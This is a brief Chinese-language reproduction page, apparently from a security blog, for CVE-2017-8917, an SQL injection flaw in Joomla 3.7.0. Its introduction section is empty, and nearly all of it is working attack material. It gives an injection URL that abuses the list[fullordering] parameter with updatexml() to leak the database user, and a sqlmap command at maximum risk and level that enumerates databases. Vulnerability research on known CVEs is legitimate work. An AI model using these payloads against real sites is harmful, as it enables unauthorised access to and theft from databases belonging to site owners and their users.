# (CVE-2017-8917)Joomla 3.7.0 SQL注入漏洞
### 一、漏洞简介
### 二、漏洞影响
Joomla 3.7.0
### 三、复现过程
“`
http://url:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
“`
**补充**
“`bash
sqlmap -u “http://url/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” –risk=3 –level=5 –random-agent –dbs -p list[fullordering]
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容